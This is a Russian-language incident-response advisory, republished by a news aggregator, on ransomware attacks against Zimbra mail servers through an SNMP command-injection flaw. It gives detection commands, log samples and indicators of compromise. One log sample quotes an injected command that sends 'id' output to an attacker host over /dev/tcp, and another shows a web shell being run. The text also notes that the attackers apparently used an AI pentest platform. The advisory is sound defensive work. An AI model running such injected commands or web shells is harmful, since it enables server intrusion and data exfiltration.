ESPNLessons from a lost season: What the Mets learned in 2026ESPN DeportesF1 anuncia calendario para 2027 con 10 sprintRTP DesportoPortugal qualificado para `oitavos` do Europeu de voleibol após derrota de IsraelInquirerMarcos yet to decide on fuel excise tax suspension – Palaceוואלהבגלל תקלה באתר העירייה: המידע רפואי ונתוני הרווחה של תושבי בית שמש היו חשופים לציבורThe Jerusalem PostNetanyahu’s New York UN visit sees unusual US Secret Service security involvementDaily MaverickGROUNDUP: The N1 town’s decade of decay — Beaufort WestBollywood HungamaThe Vvaan Trailer: Sidharth Malhotra and Tamannaah Bhatia starrer explores Indian folklore, supernatural elements and adventure; watch20 MinutenNeuer 64’315-Franken-Mercedes macht nur Ärger: «Bin enttäuscht»The Hollywood Reporter‘Trash Mountain’ Review: A Gay Man Returns to His Conservative Hometown in a Warm, Perceptive Indie Comedy-DramaWirtualna Polska9 na 10 Polaków odczuwa monotonię posiłków. Nie chcemy rewolucji w kuchni, szukamy prostych sposobów na więcej smaku – coraz częściej sięgamy po sosy [RAPORT]ХабрКак мы измеряли рекламные обещания регулярками и почему первая выгрузка соврала вдвое
The Daily Newsstand · Free, Always
Wednesday, September 16, 2026

Ваш сервер Zimbra под угрозой

Translate

Недавно наша команда по реагированию на инциденты (PT ESC IR) столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.

Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.

Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.

Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.

Сценарий атаки

  1. В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл /opt/zimbra/jetty_base/webapps/zimbra/public/version.txt (или versions.txt), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.

  2. На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера /opt/zimbra/jetty_base/webapps/zimbra/public/. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, как детектировать инструмент Gsocket.

  3. Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.

  4. После шифрования файлов шифровальщик изменяет их расширение на .elock, а также создает в зашифрованных директориях файлы !README_RECOVER.txt, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.

Как проверить ваш почтовый сервер Zimbra на наличие признаков компрометации

  1. В основном системном журнале почтовой службы /var/log/maillog записи, содержащие подстроку changed from stopped to, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.

    Для поиска вредоносных событий на вашем сервере может использоваться следующая команда: grep "changed from stopped to" /var/log/maillog

    Пример выполнения команды id и передачи ее вывода на С2-сервер злоумышленников:

    Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id>/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n  
    
    - время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; 
    - [REDACTED_IP_1]: С2 адрес злоумышленников; 
    - id>/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе.
  2. Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге /opt/zimbra/jetty_base/webapps/zimbra/ и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.

    Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:

    find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname '*.jsp' -newermt '2026-07-01' (поиск по дате изменения файла)

    find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname '*.jsp' -newerBt '2026-07-01' (поиск по дате создания файла)

    Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку. Также проверьте сервер антивирусными средствами.

  3. В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение /var/log/nginx/access.log) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге /opt/zimbra/jetty_base/webapps/zimbra/ и во всех его подкаталогах (в частности, часто используемый каталог /opt/zimbra/jetty_base/webapps/zimbra/public/), могут свидетельствовать о наличии WEB-shell'ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.

    Пример вывода результата выполнения команды ls в браузер атакующего:

[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889  

- [REDACTED_IP]: С2 адрес злоумышленников; 
- [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell; 
- public/bzng.jsp: расположение WEB-shell; 
- ls: выполняемая команда.

Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы CyberStrikeAI, размещенные на нескольких С2-серверах (скриншоты 1 и 2).

Скриншот 1

Скриншот 1

CyberStrikeAI — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.

Скриншот 2

Скриншот 2

Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.

Наши рекомендации

  1. Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.

  2. В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета zimbra-snmp.

  3. Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.

Индикаторы компрометации

Файловые индикаторы

/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt или versions.txt — файл, содержащий версию ПО Zimbra;

/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp — WEB-shell;

/opt/zimbra/log/defunct — Gsocket;

elockc[a-z] (например, elockcl) — шифровальщик;

runloop.sh — скрипт, создаваемый шифровальщиком;

!README_RECOVER.txt — записка злоумышленников;

*.elock — файлы с расширением .elock.


Сетевые индикаторы

135.136.63.63
139.28.49.138
146.70.169.246
193.24.211.91
193.32.126.168
31.177.110.136
37.32.73.156
64.62.156.162
64.62.156.222
64.62.156.94
88.214.21.183
89.116.171.182
89.117.94.35

Gsocket

*.gs.thc.org
gsocket.io
152.53.173.29
152.53.173.30
176.65.149.52
212.132.98.170
217.154.53.116
217.154.53.187
45.90.4.121
45.90.4.128
51.91.190.241
51.91.190.242
View the original on Хабр

KioskNews shows a cleaned-up reading view extracted from the publisher’s page — the original always lives on their site, not ours.